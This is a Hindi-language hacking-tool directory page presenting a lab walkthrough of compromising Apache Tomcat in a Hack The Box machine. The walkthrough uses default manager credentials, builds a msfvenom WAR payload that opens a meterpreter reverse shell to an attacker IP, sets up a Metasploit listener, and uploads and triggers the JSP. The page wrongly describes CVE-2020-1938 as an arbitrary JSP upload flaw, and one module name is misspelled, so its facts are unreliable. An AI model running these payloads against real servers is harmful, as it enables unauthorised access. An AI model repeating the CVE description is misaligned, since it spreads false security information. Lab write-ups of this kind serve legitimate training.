Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-1938-Exploitation — CVE-2020-1938 (Apache Tomcat में arbitrary JSP upload से RCE) का शोषण करने के लिए चरण-दर-चरण वॉकथ्रू, जिसमें msfvenom और Metasploit का उपयोग Hack The Box लैब वातावरण में किया गया है। | Kitploit
उपकरण/GitHubGitHub/hopsypopsy8/cve-2020-1938-exploitation
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubhopsypopsy8/cve-2020-1938-exploitation

CVE-2020-1938-Exploitation

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-1938 (Apache Tomcat में arbitrary JSP upload से RCE) का शोषण करने के लिए चरण-दर-चरण वॉकथ्रू, जिसमें msfvenom और Metasploit का उपयोग Hack The Box लैब वातावरण में किया गया है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2020-1938 शोषण

Apache Tomcat मनमाना JSP अपलोड जिससे RCE होता है

विवरण

CVE-2020-1938 एक गंभीर कमजोरी है जो Apache Tomcat के 9.0.0.M1 से 9.0.0.30, 8.5.0 से 8.5.50 और 7.0.0 से 7.0.99 संस्करणों को प्रभावित करती है ⚠️ इसका Hack The Box प्रयोगशाला में शोषण किया गया था।

🔗 संदर्भ: NIST NVD प्रविष्टि

टोह लेना

हमले का वेक्टर पहचानना

image
  1. वेबसाइट में सर्वर स्थिति सुविधा के लिए डिफ़ॉल्ट क्रेडेंशियल हैं।

  2. यह इंटरफ़ेस इंगित करता है कि संस्करण Apache Tomcat/7.0.88, 64 बिट आर्किटेक्चर है।

  3. इस इंटरफ़ेस से हम एप्लिकेशन सूचीबद्ध करने के लिए जाते हैं जो .war फ़ाइल अपलोड सुविधा को उजागर करता है।

  4. सफल अपलोड पर .war फ़ाइल /directory/filename पर निष्पादित होती है।

  5. Apache Tomcat संस्करण पर शोध ने CVE-2020-1938 की कमजोरी की पुष्टि की।

  6. शोषण

.war फ़ाइल उत्पन्न करना

root@kitploit:~
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war

msfvenom का उपयोग करते हुए, जो एक मेटास्प्लॉइट पेलोड जनरेटर है, हम अपना exploit.war पेलोड उत्पन्न करते हैं।

  1. -p windows/x64/meterpreter_reverse_tcp पेलोड का प्रकार है (हमारे मामले में 64 बिट जैसा कि सर्वर स्थिति में पहचाना गया)
  2. LHOST=10.10.14.3 LPORT=3004 हमलावर मशीन के लिए रिवर्स कनेक्शन विवरण हैं
  3. -f war फ़ाइल प्रकार है
  4. -o exploit.war आउटपुट फ़ाइल नाम

फ़ाइल उत्पन्न करने के बाद, फ़ाइल में जाएं और .jsp फ़ाइल का नाम ढूंढें जैसे gcvxdtmxvw.jsp और इसे बाद के लिए सहेजें।

मेटास्प्लॉइट सेट करना

root@kitploit:~
msfconsole
use exploit/multi/hanlder
Set LHOST 10.10.14.3
Set LPORT 3004

msfconsole का उपयोग करके हम एक लिसनर सेट करते हैं जो हमारे पेलोड के निष्पादित होने की प्रतीक्षा करता है।

दुर्भावनापूर्ण फ़ाइल अपलोड करना और चलाना

image image

हम अपनी फ़ाइल को डिप्लॉय अनुभाग में अपलोड करते हैं, उसके बाद स्क्रीन को रिफ्रेश करते हैं और पाते हैं कि फ़ाइल सफलतापूर्वक अपलोड हो गई है। शोषण को पूरा करने के लिए हमें ip/hacked/gcvxdtmxvw.jsp पथ पर नेविगेट करना होगा।

image

यह अनुरोध को हैंग करता है हालांकि हम अपनी मशीन पर स्थानीय रूप से देख सकते हैं कि हमारे पास एक रिवर्स कनेक्शन है।

टूल डाउनलोड करें